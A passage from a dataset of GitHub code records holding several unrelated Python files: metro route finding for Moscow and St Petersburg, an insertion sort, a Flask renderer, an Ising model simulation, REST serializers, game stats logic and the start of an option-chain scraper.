'Борисово10': [('Шипиловская10', 'Марьино10'), 1000, '', False],\r\n 'Марьино10': [('Борисово10', 'Братиславская10'), 1000, '', False],\r\n 'Братиславская10': [('Марьино10', 'Люблино10'), 1000, '', False],\r\n 'Люблино10': [('Братиславская10', 'Волжская10'), 1000, '', False],\r\n 'Волжская10': [('Люблино10', 'Печатники10'), 1000, '', False],\r\n 'Печатники10': [('Волжская10', 'Кожуховская10'), 1000, '', False],\r\n 'Кожуховская10': [('Печатники10', 'Дубровка10'), 1000, '', False],\r\n 'Дубровка10': [('Кожуховская10', 'Крестьянская застава10'), 1000, '', False],\r\n 'Крестьянская застава10': 
[('Дубровка10', 'Римская10', 'Пролетарская7'), 1000, '', False],\r\n 'Римская10': [('Крестьянская застава10', 'Чкаловская10', 'Площадь Ильича8'), 1000, '', False],\r\n 'Чкаловская10': [('Римская10', 'Курская5', 'Сретенский бульвар10', 'Курская3'), 1000, '', False],\r\n 'Сретенский бульвар10': [('Чкаловская10', 'Трубная10', 'Чистые пруды1', 'Тургеневская6'), 1000, '', False],\r\n 'Трубная10': [('Сретенский бульвар10', 'Достоевская10', 'Цветной бульвар9'), 1000, '', False],\r\n 'Достоевская10': [('Трубная10', 'Марьина роща10'), 1000, '', False],\r\n 'Марьина роща10': [('Достоевская10', 'Бутырская10'), 1000, '', False],\r\n 'Бутырская10': [('Марьина роща10', 'Фонвизинская10'), 1000, '', False],\r\n 'Фонвизинская10': [('Бутырская10',), 1000, '', False],\r\n 'Котельники7': [('Жулебино7',), 1000, '', False],\r\n 'Жулебино7': [('Котельники7', 'Лермонтовский проспект7'), 1000, '', False],\r\n 'Лермонтовский проспект7': [('Жулебино7', 'Выхино7'), 1000, '', False],\r\n 'Выхино7': [('Лермонтовский проспект7', 'Рязанский проспект7'), 1000, '', False],\r\n 'Рязанский проспект7': [('Выхино7', 'Кузьминки7'), 1000, '', False],\r\n 'Кузьминки7': [('Рязанский проспект7', 'Текстильщики7'), 1000, '', False],\r\n 'Текстильщики7': [('Кузьминки7', 'Волгоградский проспект7'), 1000, '', False],\r\n 'Волгоградский проспект7': [('Текстильщики7', 'Пролетарская7'), 1000, '', False],\r\n 'Пролетарская7': [('Волгоградский проспект7', 'Таганская7', 'Крестьянская застава10'), 1000, '', False],\r\n 'Таганская7': [('Пролетарская7', 'Китай-город7', 'Таганская5'), 1000, '', False],\r\n 'Китай-город7': [('Таганская7', 'Китай-город6', 'Кузнецкий мост7'), 1000, '', False],\r\n 'Кузнецкий мост7': [('Китай-город7', 'Пушкинская7', 'Лубянка1'), 1000, '', False],\r\n 'Пушкинская7': [('Кузнецкий мост7', 'Баррикадная7', 'Тверская2', 'Чеховская9'), 1000, '', False],\r\n 'Баррикадная7': [('Пушкинская7', 'Улица 1905 года7', 'Краснопресненская5'), 1000, '', False],\r\n 'Улица 1905 года7': [('Баррикадная7', 'Беговая7'), 1000, '', False],\r\n 'Беговая7': [('Улица 1905 года7', 'Полежаевская7'), 1000, '', False],\r\n 'Полежаевская7': [('Беговая7', 'Октябрьское Поле7'), 1000, '', False],\r\n 'Октябрьское Поле7': [('Полежаевская7', 'Щукинская7'), 1000, '', False],\r\n 'Щукинская7': [('Октябрьское Поле7', 'Спартак7'), 1000, '', False],\r\n 'Спартак7': [('Щукинская7', 'Тушинская7'), 1000, '', False],\r\n 'Тушинская7': [('Спартак7', 'Сходненская7'), 1000, '', False],\r\n 'Сходненская7': [('Тушинская7', 'Планерная7'), 1000, '', False],\r\n 'Планерная7': [('Сходненская7', ), 1000, '', False],\r\n 'Новокосино8': [('Новогиреево8',), 1000, '', False],\r\n 'Новогиреево8': [('Новокосино8', 'Перово8'), 1000, '', False],\r\n 'Перово8': [('Новогиреево8', 'Шоссе энтузиастов8'), 1000, '', False],\r\n 'Шоссе энтузиастов8': [('Перово8', 'Авиамоторная8'), 1000, '', False],\r\n 'Авиамоторная8': [('Шоссе энтузиастов8', 'Площадь Ильича8'), 1000, '', False],\r\n 'Площадь Ильича8': [('Авиамоторная8', 'Марксистская8', 'Римская10'), 1000, '', False],\r\n 'Марксистская8': [('Площадь Ильича8', 'Третьяковская8', 'Таганская7', 'Таганская5'), 1000, '', False],\r\n 'Третьяковская8': [('Марксистская8', 'Новокузнецкая2', 'Третьяковская6'), 1000, '', False],\r\n 'Щелковская3': [('Первомайская3', ), 1000, '', False],\r\n 'Первомайская3': [('Щелковская3', 'Измайловская3'), 1000, '', False],\r\n 'Измайловская3': [('Первомайская3', 'Партизанская3'), 1000, '', False],\r\n 'Партизанская3': [('Измайловская3', 'Семеновская3'), 1000, '', False],\r\n 'Семеновская3': [('Партизанская3', 
'Электрозаводская3'), 1000, '', False],\r\n 'Электрозаводская3': [('Семеновская3', 'Бауманская3'), 1000, '', False],\r\n 'Бауманская3': [('Электрозаводская3', 'Курская3'), 1000, '', False],\r\n 'Курская3': [('Бауманская3', 'Площадь революции3', 'Чкаловская10'), 1000, '', False],\r\n 'Площадь революции3': [('Курская3', 'Арбатская3', 'Театральная2', 'Охотный ряд1'), 1000, '', False],\r\n 'Арбатская3': [('Площадь революции3', 'Смоленская3', 'Библиотека имени Ленина1', 'Боровицкая9', 'Александровский сад4'), 1000, '', False],\r\n 'Смоленская3': [('Арбатская3', 'Киевская3'), 1000, '', False],\r\n 'Киевская3': [('Смоленская3', 'Парк победы3', 'Киевская5', 'Киевская4'), 1000, '', False],\r\n 'Парк победы3': [('Киевская3', 'Славянский бульвар3'), 1000, '', False],\r\n 'Славянский бульвар3': [('Парк победы3', 'Кунцевская3'), 1000, '', False],\r\n 'Кунцевская3': [('Славянский бульвар3', 'Молодежная3', 'Кунцевская4'), 1000, '', False],\r\n 'Молодежная3': [('Кунцевская3', 'Крылатское3'), 1000, '', False],\r\n 'Крылатское3': [('Молодежная3', 'Строгино3'), 1000, '', False],\r\n 'Строгино3': [('Крылатское3', 'Мякинино3'), 1000, '', False],\r\n 'Мякинино3': [('Строгино3', 'Волоколамская3'), 1000, '', False],\r\n 'Волоколамская3': [('Мякинино3', 'Митино3'), 1000, '', False],\r\n 'Митино3': [('Волоколамская3', 'Пятницкое шоссе3'), 1000, '', False],\r\n 'Пятницкое шоссе3': [('Митино3',), 1000, '', False],\r\n 'Александровский сад4': [('Арбатская4', 'Охотный ряд1', 'Боровицкая9', 'Арбатская3'), 1000, '', False],\r\n 'Арбатская4': [('Александровский сад4', 'Смоленская4'), 1000, '', False],\r\n 'Смоленская4': [('Арбатская4', 'Киевская4'), 1000, '', False],\r\n 'Киевская4': [('Смоленская4', 'Студенческая4', 'Киевская5', 'Киевская3'), 1000, '', False],\r\n 'Студенческая4': [('Киевская4', 'Кутузовская4'), 1000, '', False],\r\n 'Кутузовская4': [('Студенческая4', 'Фили4'), 1000, '', False],\r\n 'Фили4': [('Кутузовская4', 'Багратионовская4'), 1000, '', False],\r\n 'Багратионовская4': [('Фили4', 'Филевский парк4'), 1000, '', False],\r\n 'Филевский парк4': [('Багратионовская4', 'Пионерская4'), 1000, '', False],\r\n 'Пионерская4': [('Филевский парк4', 'Кунцевская4'), 1000, '', False],\r\n 'Кунцевская4': [('Пионерская4', 'Кунцевская4', 'Кунцевская3'), 1000, '', False],\r\n 'Каховская11': [('Варшавская11', 'Севастопольская9'), 1000, '', False],\r\n 'Варшавская11': [('Каховская11', 'Каширская11'), 1000, '', False],\r\n 'Каширская11': [('Варшавская11', 'Каширская2'), 1000, '', False]}\r\n\r\n\r\nmetroTMP1 = {'Проспект Ветеранов1': [('Ленинский проспект1',), 1000, '', False],\r\n 'Ленинский проспект1': [('Проспект Ветеранов1', 'Автово1'), 1000, '', False],\r\n 'Автово1': [('Ленинский проспект1', 'Кировский завод1'), 1000, '', False],\r\n 'Кировский завод1': [('Автово1', 'Нарвская1'), 1000, '', False],\r\n 'Нарвская1': [('Кировский завод1', 'Балтийская1'), 1000, '', False],\r\n 'Балтийская1': [('Нарвская1', 'Технологический институт1'), 1000, '', False],\r\n 'Технологический институт1': [('Балтийская1', 'Пушкинская1', 'Технологический институт2'), 1000, '', False],\r\n 'Пушкинская1': [('Технологический институт1', 'Владимирская1', 'Звенигородская5'), 1000, '', False],\r\n 'Владимирская1': [('Пушкинская1', 'Площадь Восстания1', 'Достоевская4'), 1000, '', False],\r\n 'Площадь Восстания1': [('Владимирская1', 'Чернышевская1', 'Маяковская3'), 1000, '', False],\r\n 'Чернышевская1': [('Площадь Восстания1', 'Площадь Ленина1'), 1000, '', False],\r\n 'Площадь Ленина1': [('Чернышевская1', 'Выборгская1'), 1000, '', False],\r\n 
'Выборгская1': [('Площадь Ленина1', 'Лесная1'), 1000, '', False],\r\n 'Лесная1': [('Выборгская1', 'Площадь Мужества1'), 1000, '', False],\r\n 'Площадь Мужества1': [('Лесная1', 'Политехническая1'), 1000, '', False],\r\n 'Политехническая1': [('Площадь Мужества1', 'Академическая1'), 1000, '', False],\r\n 'Академическая1': [('Политехническая1', 'Гражданский проспект1'), 1000, '', False],\r\n 'Гражданский проспект1': [('Академическая1', 'Девяткино1'), 1000, '', False],\r\n 'Девяткино1': [('Гражданский проспект1',), 1000, '', False],\r\n 'Купчино2': [('Звездная2',), 1000, '', False],\r\n 'Звездная2': [('Купчино2', 'Московская2'), 1000, '', False],\r\n 'Московская2': [('Звездная2', 'Парк Победы2'), 1000, '', False],\r\n 'Парк Победы2': [('Московская2', 'Электросила2'), 1000, '', False],\r\n 'Электросила2': [('Парк Победы2', 'Московские ворота2'), 1000, '', False],\r\n 'Московские ворота2': [('Электросила2', 'Фрунзенская2'), 1000, '', False],\r\n 'Фрунзенская2': [('Московские ворота2', 'Технологический институт2'), 1000, '', False],\r\n 'Технологический институт2': [('Фрунзенская2', 'Сенная площадь2', 'Технологический институт1'), 1000, '', False],\r\n 'Сенная площадь2': [('Технологический институт2', 'Невский проспект2', 'Спасская4'), 1000, '', False],\r\n 'Невский проспект2': [('Сенная площадь2', 'Горьковская2', 'Гостиный двор3'), 1000, '', False],\r\n 'Горьковская2': [('Невский проспект2', 'Петроградская2'), 1000, '', False],\r\n 'Петроградская2': [('Горьковская2', 'Черная речка2'), 1000, '', False],\r\n 'Черная речка2': [('Петроградская2', 'Пионерская2'), 1000, '', False],\r\n 'Пионерская2': [('Черная речка2', 'Удельная2'), 1000, '', False],\r\n 'Удельная2': [('Пионерская2', 'Озерки2'), 1000, '', False],\r\n 'Озерки2': [('Удельная2', 'Проспект Просвещения2'), 1000, '', False],\r\n 'Проспект Просвещения2': [('Озерки2', 'Парнас2'), 1000, '', False],\r\n 'Парнас2': [('Проспект Просвещения2',), 1000, '', False],\r\n 'Международная5': [('Бухарестская5',), 1000, '', False],\r\n 'Бухарестская5': [('Международная5', 'Волковская5'), 1000, '', False],\r\n 'Волковская5': [('Бухарестская5', 'Обводный канал5'), 1000, '', False],\r\n 'Обводный канал5': [('Волковская5', 'Звенигородская5'), 1000, '', False],\r\n 'Звенигородская5': [('Обводный канал5', 'Садовая5', 'Пушкинская1'), 1000, '', False],\r\n 'Садовая5': [('Звенигородская5', 'Адмиралтейская5', 'Сенная площадь2', 'Спасская4'), 1000, '', False],\r\n 'Адмиралтейская5': [('Садовая5', 'Спортивная5'), 1000, '', False],\r\n 'Спортивная5': [('Адмиралтейская5', 'Чкаловская5'), 1000, '', False],\r\n 'Чкаловская5': [('Спортивная5', 'Крестовский остров5'), 1000, '', False],\r\n 'Крестовский остров5': [('Чкаловская5', 'Старая Деревня5'), 1000, '', False],\r\n 'Старая Деревня5': [('Крестовский остров5', 'Комендантский проспект5'), 1000, '', False],\r\n 'Комендантский проспект5': [('Старая Деревня5',), 1000, '', False],\r\n 'Рыбацкое3': [('Обухово3',), 1000, '', False],\r\n 'Обухово3': [('Рыбацкое3', 'Пролетарская3'), 1000, '', False],\r\n 'Пролетарская3': [('Обухово3', 'Ломоносовская3'), 1000, '', False],\r\n 'Ломоносовская3': [('Пролетарская3', 'Елизаровская3'), 1000, '', False],\r\n 'Елизаровская3': [('Ломоносовская3', 'Площадь Александра Невского3'), 1000, '', False],\r\n 'Площадь Александра Невского3': [('Елизаровская3', 'Маяковская3', 'Площадь Александра Невского4'), 1000, '', False],\r\n 'Маяковская3': [('Гостиный двор3', 'Площадь Александра Невского3', 'Площадь Восстания1'), 1000, '', False],\r\n 'Гостиный двор3': [('Площадь Александра Невского3', 
'Василеостровская3', 'Невский проспект2'), 1000, '', False],\r\n             'Василеостровская3': [('Гостиный двор3', 'Приморская3'), 1000, '', False],\r\n             'Приморская3': [('Василеостровская3', ), 1000, '', False],\r\n             'Улица Дыбенко4': [('Проспект Большевиков4',), 1000, '', False],\r\n             'Проспект Большевиков4': [('Улица Дыбенко4', 'Ладожская4'), 1000, '', False],\r\n             'Ладожская4': [('Проспект Большевиков4', 'Новочеркасская4'), 1000, '', False],\r\n             'Новочеркасская4': [('Ладожская4', 'Площадь Александра Невского4'), 1000, '', False],\r\n             'Площадь Александра Невского4': [('Новочеркасская4', 'Лиговский проспект4', 'Площадь Александра Невского3'), 1000, '', False],\r\n             'Лиговский проспект4': [('Площадь Александра Невского4', 'Достоевская4'), 1000, '', False],\r\n             'Достоевская4': [('Лиговский проспект4', 'Спасская4', 'Владимирская1'), 1000, '', False],\r\n             'Спасская4': [('Сенная площадь2', 'Садовая5', 'Достоевская4'), 1000, '', False]}\r\n\r\n\r\nbranchesMos = {'Сокольническая' : '1', 'Замоскворецкая' : '2', 'Арбатско-Покровская' : '3', 'Филёвская' : '4', 'Кольцевая' : '5', 'Калужско-Рижская' : '6',\r\n               'Таганско-Краснопресненская' : '7', 'Калининско-Солнцевской' : '8', 'Серпуховско-Тимирязевская' : '9', 'Люблинско-Дмитровская' : '10',\r\n               'Каховская' : '11'}\r\n\r\nbranchesSpb = {'Кировско-Выборгская' : '1', 'Московско-Петроградская' : '2', 'Невско-Василеостровская' : '3', 'Правобережная' : '4', 'Фрунзенско-Приморская' : '5'}\r\n\r\ndef findNumOfBranch(st, metroLst):\r\n    branchNum = ''\r\n    for i in metroLst:\r\n        if i[:-1] == st:\r\n            branchNum = i[-1:]\r\n        elif i[:-2] == st:\r\n            branchNum = i[-2:]\r\n\r\n    return branchNum\r\n\r\ndef findWay(yourStation, bankStation, city):\r\n    global metroTMP, metroBranch, branchesSpb, metroTMP1\r\n    metroBranch = {}\r\n    metroMap = {}\r\n\r\n    if city == 0:\r\n        metroBranch = branchesMos\r\n        metroMap = metroTMP\r\n    else:\r\n        metroBranch = branchesSpb\r\n        metroMap = metroTMP1\r\n\r\n    count = len(metroMap)\r\n\r\n\r\n    for i in metroMap.keys():\r\n        metroMap[i][1] = 1000\r\n        metroMap[i][2] = ''\r\n        metroMap[i][3] = False\r\n    metroLst = list(metroMap)\r\n\r\n    if yourStation[-1] != ')':\r\n        yourStation += findNumOfBranch(yourStation, metroLst)\r\n    else:\r\n        r1 = re.findall('[(](.*)[)]', yourStation)\r\n        branch = metroBranch[r1[0]]\r\n        r2 = re.findall('(.+)[ ]', yourStation)\r\n        yourStation = r2[0] + branch\r\n\r\n    if bankStation[-1] != ')':\r\n        bankStation += findNumOfBranch(bankStation, metroLst)\r\n    else:\r\n        r1 = re.findall('[(](.*)[)]', bankStation)\r\n        branch = metroBranch[r1[0]]\r\n        r2 = re.findall('(.+)[ ]', bankStation)\r\n        bankStation = r2[0] + branch\r\n\r\n    #print(yourStation, bankStation)\r\n\r\n    st = metroMap.get(yourStation)\r\n\r\n    if not st:\r\n        return None\r\n    else:\r\n        st[1] = 0\r\n        for i in st[0]:\r\n            temp = metroMap.get(i)\r\n            temp[1] = 1\r\n            temp[2] = yourStation\r\n        st[2] = yourStation\r\n        st[3] = True\r\n        count -= 1\r\n\r\n    while count > 0:\r\n        for i in metroMap.keys():\r\n            st = metroMap[i]\r\n            if st[1] != 1000 and st[3] != True:\r\n                weight = st[1]\r\n                for j in st[0]:\r\n                    if metroMap[j][1] >= (weight + 1):\r\n                        metroMap[j][1] = (weight + 1)\r\n                        metroMap[j][2] = i\r\n                metroMap[i][3] = True\r\n                if count <= 0:\r\n                    break\r\n        count -= 1\r\n\r\n    # wayList = []\r\n    # wayList.append(bankStation)\r\n    # curSt = metroMap[bankStation][2]\r\n    # while curSt != yourStation:\r\n    #     wayList.append(curSt)\r\n    #     curSt = metroMap[curSt][2]\r\n\r\n\r\n    return 
metroMap[bankStation][1]\r\n\r\n\r\n\r\n\r\n","repo_name":"grivis/Python-Web-Projects","sub_path":"metroFind_more_Class.py","file_name":"metroFind_more_Class.py","file_ext":"py","file_size_in_byte":36249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74337695413","text":"def insertionsort(A):\n    n = len(A)\n    for i in range(1,n):\n        cvalue = A[i]\n        position = i\n        while position > 0 and A[position - 1] > cvalue:\n            A[position] = A[position-1]\n            position = position - 1\n\n        A[position] = cvalue\n\nA = [3, 5, 8, 9, 6, 2]\nprint(\"Original Array: \",A)\ninsertionsort(A)\nprint(\"Sorted Array: \",A)\n\n\n\n","repo_name":"Abinash2555/Data-Structure-And-Algorithm-With-Python","sub_path":"Sorting/insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14325181137","text":"from flask import render_template\n\ndef dealing(result):\n    threshold = 0.002\n    result.sort(key=lambda tup : tup[1])\n    result.reverse()\n    #print result\n    return [ (name,rate,points) for name,rate,points in result if rate > threshold]\n\ndef renderImage(result):\n    hostname = \"http://127.0.0.1:8888/static/\"\n    temp = [{ \"url\" : hostname + name , \"name\" :\n        name,\"rank\":rate,\"points\":points } for name,rate,points in result]\n    return render_template(\"result.html\",images = temp)\n    \n","repo_name":"lanstonpeng/imageSearch","sub_path":"core/manipulator.py","file_name":"manipulator.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"75015353333","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 31 14:29:17 2018\n\n@author: Chao Wan\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nneq = pow(10,4)\nnsteps = pow(10,5)\nL = 3\n\ndef init_state(L):\n    psi0 = np.zeros((L+1)*(L+1))\n    psi0 = psi0.reshape(L+1,L+1)\n    psi0 = np.mat(psi0) \n    for i in range(L):\n        for j in range(L):\n            list = [-1,1]\n            psi0[i,j] = np.random.choice(list)\n    for i in range(L+1):\n        psi0[L,i] = psi0[0,i]\n        psi0[i,L] = psi0[i,0]\n    return psi0\n\ndef magnetization(state):\n    sum = 0.\n    m = 0.\n    for i in range(L):\n        for j in range(L):\n            sum += state[i,j]\n    m = sum/pow(L,2)\n    return m\n\ndef energy(state):\n    E = 0.\n    for i in range(L):\n        for j in range(L):\n            E += (-1)*state[i,j]*state[i+1,j]+(-1)*state[i,j]*state[i,j+1]\n    return E/pow(L,2)\n\ndef mcstep(state, temp):\n    newstate = state.copy() # copy, so a rejected flip does not mutate the input state\n    list = range(L)\n    rand = 0.\n    i = np.random.choice(list)\n    j = np.random.choice(list)\n    newstate[i,j] *= -1\n    for i in range(L):\n        newstate[L,i] = newstate[0,i]\n        newstate[i,L] = newstate[i,0]\n    deltaE = energy(newstate)-energy(state)\n    if deltaE < 0:\n        state = newstate\n    else:\n        rand = np.random.uniform(0,1) # np.random avoids the missing `import random`\n        if rand < np.exp(-deltaE/temp):\n            state = newstate\n    return state\n\n\nif __name__=='__main__':\n    '''set up initial configuration'''\n    conf = init_state(L)\n    '''number of steps to equilibrate the initial configuration'''\n\n    '''Sample temperature between 4 and 1'''\n    \n    '''define lists to sample thermodynamic quantities for different temperatures'''\n    Tn = []\n    for i in range(25):\n        Tn.append(1+0.12*i)\n    print(Tn)\n    \n    j = 0\n    ener = []\n    magn = []\n    for i in range(nsteps):\n        conf = mcstep(conf, 2)\n        if i == neq:\n            print(conf)\n        if i > neq:\n            if np.mod(i,100) == 0:\n                ener.append(energy(conf))\n                magn.append(magnetization(conf))\n    print(ener)\n    print(magn)\n    
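    # --- Illustrative aside added by the editor; not part of the original script. ---
    # The temperature sweep below stores the raw sample variances np.var(ener) and
    # np.var(magn). For the standard 2D Ising observables (taking k_B = 1) these are
    # usually normalised as C_v ~ Var(E)/T**2 and chi ~ Var(m)/T, so a hypothetical
    # post-processing step (the names cv_norm and chi_norm are invented here) could be:
    #     cv_norm  = [c / t**2 for c, t in zip(cv, Tn)]
    #     chi_norm = [x / t    for x, t in zip(chi, Tn)]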
plt.subplot(211)\n plt.plot(range(len(magn)),magn,'b',label = 'magnetization')\n plt.plot(range(len(ener)),ener,'r', label = 'energy')\n plt.show()\n \n meanm = []\n meane = []\n cv = []\n chi = []\n for T in Tn:\n ener = []\n magn = []\n for i in range(nsteps):\n conf = mcstep(conf,T)\n if i > neq:\n if np.mod(i,100) == 0:\n ener.append(energy(conf))\n magn.append(magnetization(conf))\n cv.append(np.var(ener))\n meanm.append(np.mean(magn))\n meane.append(np.mean(ener))\n chi.append(np.var(magn))\n \n print(meane)\n print(meanm)\n print(chi)\n print(cv)\n \n plt.plot(Tn,meane,'b',Tn,meanm,'r',Tn,cv,'g',Tn,chi,'pink')\n plt.show()\n \n\n","repo_name":"OetkerZ/gitforhomework","sub_path":"ASP/T5/Chao-2d-ising.py","file_name":"Chao-2d-ising.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73539983093","text":"######################################\n# Import and initialize the librarys #\n######################################\nfrom random import randint\nfrom code.api.core import os, log, screens, coreFunc, PgEss\nfrom code.api.events import gameEvent\nfrom code.api.actions import Runclass\n\n\n#################\n# Setup logging #\n#################\nfilename = os.path.basename(__file__).split('.')[0]\nlogger = log.get_logger(filename)\n\n\n##################\n# Gameplay logic #\n##################\nclass Stats(coreFunc):\n def __init__(self, day:int = None, damage:list = None, defence:int = None, health:list = None, elixir:int = None):\n self.day = day\n self.damage = damage\n self.defence = defence\n self.health = health\n self.elixir = elixir\n\n def isFullHealth(self):\n if self.health == None: return\n return self.health[0] >= self.health[1]\n\n def multiply(self, multiplier:int):\n for name, value in self.__dict__.items():\n if value != None:\n if type(value) == list: \n for i in range(len(value)): value[i] = int(value[i] * multiplier)\n else:\n value = int(value * multiplier)\n\n setattr(self, name, value)\n\n def calDamage(self, defence:int = 0):\n if self.damage != None: return max(0, randint(*self.damage) - defence)\n\n def addBonus(self, bonus, item, withDisplay:bool = False, animate = None):\n for name, by in bonus.__dict__.items():\n if by != None: self.update(name, by, item, withDisplay, animate)\n\n def update(self, name:str, by, item, withDisplay:bool = False, animate = None):\n # For damage\n if name == 'damage':\n self.damage[0] += by[0]\n self.damage[1] += by[1]\n\n # For health\n elif name == 'health':\n self.health[0] = max(0, self.health[0] + by[0])\n self.health[1] += by[1]\n\n # The rest\n else: \n setattr(self, name, getattr(self, name) + by)\n\n # Check for change orb day\n if name == 'day': gameEvent.orb_change.call()\n\n # Display change\n if animate == None: self.display(name, item, withDisplay)\n \n # If animate instead\n else: \n # Add stats animation to queue\n gameEvent.stats.addQueue(\n Runclass(run=self.animate, parameters={'name': name, 'by': by, 'item': item, 'animate': animate})\n )\n\n def animate(self, counter:int, name:str, by, item, animate):\n if counter == 0:\n # Generate the text to display\n if type(by) == list: \n if by[1] != 0: text = by[1]\n else: text = by[0]\n else: text = by\n\n # Adding polarity sign (+/-)\n if text <= 0: text = '- {}'.format(abs(text))\n else: text = '+ {}'.format(text)\n\n # Set text colour to represent the stats type\n if name == 'damage': animate.stats.format.colour = PgEss.colour.red\n elif name == 'defence': 
animate.stats.format.colour = PgEss.colour.blue\n elif name == 'health': animate.stats.format.colour = PgEss.colour.green\n elif name == 'elixir': animate.stats.format.colour = PgEss.colour.purple\n else: animate.stats.format.colour = PgEss.colour.white\n\n animate.stats.setText(text, withDisplay=False)\n\n # Pop out\n elif counter <= 30:\n animate.stats.format.modifyFont(fontSize=counter*2)\n animate.display(withData='all')\n\n # Pop back abit\n elif counter <= 34:\n animate.stats.format.modifyFont(fontSize=60-(counter-31)*2)\n animate.display(withData='all')\n\n # Show the updated stats\n elif counter == 35: self.display(name, item, True)\n\n # Pop out\n elif 100 < counter <= 126: \n animate.stats.format.modifyFont(fontSize=52-(counter-100)*2)\n animate.display(withData='all')\n\n # Animation ended \n elif counter > 126: \n animate.stats.setText('')\n return True\n\n def set(self, name:str, to, item, withDisplay:bool = False):\n # Set the new stats\n setattr(self, name, to)\n self.display(name, item, withDisplay)\n \n def display(self, name:str, item, withDisplay:bool = False):\n # Generate the text\n if name == 'damage': text = str('{} - {}'.format(*self.damage))\n elif name == 'health': text = str('{}/{}'.format(*self.health))\n else: text = str('{}'.format(getattr(self, name)))\n\n # Display to stats screen\n item[name].setText(text, withDisplay=withDisplay)\n\n\nclass Bonus(coreFunc):\n def __init__(self, damage:list = None, defence:int = None, health:list = None, elixir:int = None):\n self.damage = damage\n self.defence = defence\n self.health = health\n self.elixir = elixir\n\n def set(self, name:str, to, item, withDisplay:bool = False, index:int = 1):\n # Set the new stats\n setattr(self, name, to)\n self.display(name, item, withDisplay, index)\n\n def display(self, name:str, item = None, withDisplay:bool = False, index:int = 1):\n stats = getattr(self, name)\n # Generate teh text to display\n if type(stats) == list: text = str('+ {}'.format(stats[index]))\n else: text = str('+ {}'.format(stats))\n\n # Display to stats screen\n item[name].setText(text, withDisplay=withDisplay)\n\n\nclass Location(coreFunc):\n def __init__(self, row, column):\n self.row = row\n self.column = column\n\n def pos(self): return (self.row, self.column)\n\n def setNew(self, pos:tuple):\n self.row = pos[0]\n self.column = pos[1]\n\n\nclass Weapon(coreFunc):\n def __init__(self, weapons:list = None):\n self.weapons = []\n\n # Reset weapon grid\n screens.game.info.hero.weapons.generate()\n \n # Set weapons to display in grid\n if weapons != None: \n for weapon in weapons: self.add(weapon, False)\n \n screens.game.info.load(withItems=['hero'], refresh=True)\n\n def have(self, weapon:str): return weapon in self.weapons\n\n def add(self, weapon:str, withLoad:bool = True): \n # Add to weapon list\n self.weapons.append(weapon)\n\n # Add to gui grid\n number_of_weapons = len(self.weapons)\n row = number_of_weapons // 2\n column = number_of_weapons % 2\n\n screens.game.info.hero.weapons.tiles[row][column].sprites.append(weapon)\n if withLoad: screens.game.info.load(withItems=['hero'], refresh=True)","repo_name":"benwoo1110/Ratventure","sub_path":"python/code/logic/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":6637,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"27484185090","text":"from rest_framework import serializers\nfrom .models import Order, Product\nfrom drf_writable_nested.serializers import 
WritableNestedModelSerializer\n\nclass ProductSerializer(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = \"__all__\"\n\nclass OrderSerializer(WritableNestedModelSerializer):\n Product=ProductSerializer(many=True)\n\n class Meta:\n model = Order\n fields = ['id', 'Date', 'Product']\n\nclass StatsSerializer(serializers.Serializer):\n month = serializers.DateField(format='%Y %b')\n value = serializers.IntegerField()","repo_name":"Bartoshav/Online_store_test_task","sub_path":"online_store/store_api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39659307922","text":"\"\"\"\nCreated on Tuesday May 26 2020\n\n@author: Jeffrey J. Walker\n\n yahoo_option_chain_multi_exp.py\n This function obtains the option chain for multiple expiration dates.\n\n\t\tIs it possible to obtain the performance of the underlying for the \n\t\tprevious year? (in order to find the historical volatility if I want\n\t\tto make my own iv calculations)\n\n\tInputs:\n\t\tpath\t\t- \tthe target directory, where the option chain will be \n\t\t\t\t\t\twritten. args or kwargs for write to file flag?\n\t\t\t\t\t\tShould there be a default path if none given?\n\t\tticker\t\t-\tthe ticker symbol.\n\t\t\t\t\t\tStocks are just the letters\t\n\t\t\t\t\t\tIndices include '^' in front of the letters.\t\n\t\tinput_date\t- \tuser inputs a date? If not given, use the nearest \n\t\t\t\t\t\texpiry date? Should this be unix or datetime format?\n\t\t\t\t\t\tRight now I use unix time format, but maybe do a check\n\t\t\t\t\t\tand convert to unix format if input_date is not in\n\t\t\t\t\t\tunix format.\n\t\t\t\t\t\tCan I make this function accept multiple input dates?\n\t\t\t\t\t\tGet closest expiry date to each one in list or \n\t\t\t\t\t\tdatetime array\n\n\tOutputs:\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom datetime import date\nfrom datetime import timedelta\nfrom dateutil.tz import *\nimport time\nimport os\nimport sys\nimport json\n\n## Make optional arguments: write_path, read_path;\n#(path,ticker,scrape=True)\n## include path and ticker; \n## if optional scrape variable set to False, then treat path as a file to \n## read from instead of write to, test that the path can be opened (try bock),\n## and ticker must still be specified, but is just a dummy in such a case \ndef yahoo_option_chain_multi_exp(input_path,ticker,scrape=True):\n\t\n\t## the time zone where the code is run, possible check your location to \n\t## obtain. Could possibly use as an input, but it might be nice to check\n\t## the device's location to obtain automatically with this function\n timezone='CET'\n\t## target directory? 
